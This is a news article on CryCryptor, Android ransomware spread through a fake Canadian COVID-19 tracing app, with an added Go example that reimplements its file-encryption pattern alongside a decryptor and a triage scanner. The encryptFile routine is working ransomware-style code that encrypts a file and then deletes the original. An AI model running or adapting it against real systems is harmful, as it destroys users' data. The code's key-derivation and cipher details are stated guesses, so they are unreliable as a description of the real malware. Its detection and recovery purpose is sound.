Hackers are impersonating the Canadian government's COVID-19 contact tracing app to spread ransomware, even though the real app has not yet been released to the public.
Amid the coronavirus pandemic, as people and governments try to cope with the outbreak, contact tracing apps have an important role to play: they help identify people who may have come into contact with an infected person.
The Canadian government has recently announced its own contact tracing app, named "COVID Alert". The app is expected to be released to the public in about a month.
Hackers Target Contact Tracing App to Spread Ransomware
However, attackers are taking advantage of the interest in tracing apps to spread malware and other threats. Recently, attackers distributed fake, malware-laden apps mimicking TraceTogether, Singapore's contact tracing app. Now they are running another campaign built around a fake Android app. The app claims to be from "Health Canada", but it delivers malware that infects the device with ransomware.
Researchers at ESET discovered the attack. The hackers used two malicious domains, tracershield[.]ca and covid19tracer[.]ca, which offered users the APK file of the fake app for download; both domains are no longer active.
The CryCryptor Ransomware
If a user installs the APK, it installs a ransomware strain named "CryCryptor". The malware then asks for permission to access the files stored on the device. Once the permission is granted, it begins encrypting files with various extensions.
It encrypts the data with AES, locking the files with a random 16-character key. Each original file is replaced by three new files: the encrypted data with the ".enc" extension, plus two companion files.
The researchers added:
"The algorithm generates a salt unique for every encrypted file, stored with the extension '.enc.salt'; and an initialization vector, '.enc.iv'."
Once encryption is complete, the ransomware alerts the user with a "good news" message: "Personal files encrypted, see readme_now.txt". The referenced ransom note contains instructions on how to recover the files.
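To make the on-disk pattern concrete, here is an added example (written for this article, not ESET's analysis and not the malware's own code) in Go. It reproduces the three-file layout the researchers describe (NAME.enc, NAME.enc.salt, NAME.enc.iv, original removed), shows what a decryptor does once the 16-character key is known, and includes the triage check a responder would run over a device image to list files that carry all three artifacts. The file suffixes come from ESET's description; everything else is assumed: the key derivation (one SHA-256 over key and salt), CBC mode with PKCS#7 padding, and the 16-byte salt length. The functions `encryptFile`, `decryptFile`, `findEncrypted`, `deriveKey` and `pkcs7Unpad` are names chosen here, not anything from the malware.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"os"
	"path/filepath"
	"strings"
)

// deriveKey turns the 16-character key and a per-file salt into a 32-byte AES key.
// ASSUMPTION: one SHA-256 over key||salt; the article does not name the KDF.
func deriveKey(key string, salt []byte) []byte {
	sum := sha256.Sum256(append([]byte(key), salt...))
	return sum[:]
}

// pkcs7Unpad strips PKCS#7 padding. ASSUMPTION: CBC mode with PKCS#7 padding;
// the article only says "AES". A wrong key usually shows up here as garbage padding.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > aes.BlockSize || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// encryptFile replaces path with path.enc and writes path.enc.salt and
// path.enc.iv beside it: the three-file pattern ESET reports for CryCryptor.
// key is the random 16-character string the article describes (caller supplies it).
func encryptFile(path, key string) error {
	plain, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	rnd := make([]byte, 16+aes.BlockSize) // fresh salt and IV for every file
	if _, err := rand.Read(rnd); err != nil {
		return err
	}
	salt, iv := rnd[:16], rnd[16:]
	block, err := aes.NewCipher(deriveKey(key, salt))
	if err != nil {
		return err
	}
	pad := aes.BlockSize - len(plain)%aes.BlockSize
	ct := append(plain, bytes.Repeat([]byte{byte(pad)}, pad)...) // PKCS#7
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, ct)        // encrypt in place
	for suffix, data := range map[string][]byte{".enc": ct, ".enc.salt": salt, ".enc.iv": iv} {
		if err := os.WriteFile(path+suffix, data, 0o600); err != nil {
			return err
		}
	}
	return os.Remove(path)
}

// decryptFile is what a decryptor does once the key is known: read the salt and
// IV from the companion files, re-derive the AES key and undo CBC.
func decryptFile(encPath, key string) ([]byte, error) {
	var parts [3][]byte // .enc, .enc.salt, .enc.iv
	for i, suffix := range []string{"", ".salt", ".iv"} {
		var err error
		if parts[i], err = os.ReadFile(encPath + suffix); err != nil {
			return nil, err
		}
	}
	ct, salt, iv := parts[0], parts[1], parts[2]
	if len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("malformed .enc or .enc.iv file")
	}
	block, err := aes.NewCipher(deriveKey(key, salt))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// findEncrypted walks root and returns each .enc file that has both companion
// artifacts beside it: the triage check a responder runs on a suspect device image.
func findEncrypted(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(p string, d os.DirEntry, err error) error {
		if err != nil || d.IsDir() || !strings.HasSuffix(p, ".enc") {
			return err
		}
		_, errSalt := os.Stat(p + ".salt")
		_, errIV := os.Stat(p + ".iv")
		if errSalt == nil && errIV == nil {
			hits = append(hits, p)
		}
		return nil
	})
	return hits, err
}
```

The point of the triplet check in `findEncrypted` is that a lone `.enc` file is weak evidence (plenty of legitimate software uses that suffix), whereas a `.enc` file flanked by `.enc.salt` and `.enc.iv` matches the specific layout the researchers describe. Because the salt and IV are stored in the clear next to each file, recovery only ever depends on obtaining the 16-character key, which is why a decryptor is feasible once that key is available.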
What Researchers Found
The source code of this ransomware is available on GitHub under the name "CryDroid". The person behind it claims it is a research project, but that claim is doubtful.
The ESET blog post concludes:
We dismiss the claim that the project has research purposes – no responsible researcher would publicly release a tool that is easy to misuse for malicious purposes.
Fortunately, the ESET team has created a decryption tool for the ransomware to help infected users recover their files.
To keep users safe, the Canadian government is expected to take steps to educate the public about the app's release status and the correct way to obtain it, so that nobody falls for such scams. In the meantime, users should follow these basic precautions:
- Avoid downloading apps from unknown sources; install apps only from the official app stores.
- Enable Google Play Protect, which scans apps before and after installation.
- Enable two-factor authentication on your accounts.
- Use strong, unique passwords, and keep them in a password manager, which stores them in encrypted form.
- Install a reputable anti-virus program to keep threats away.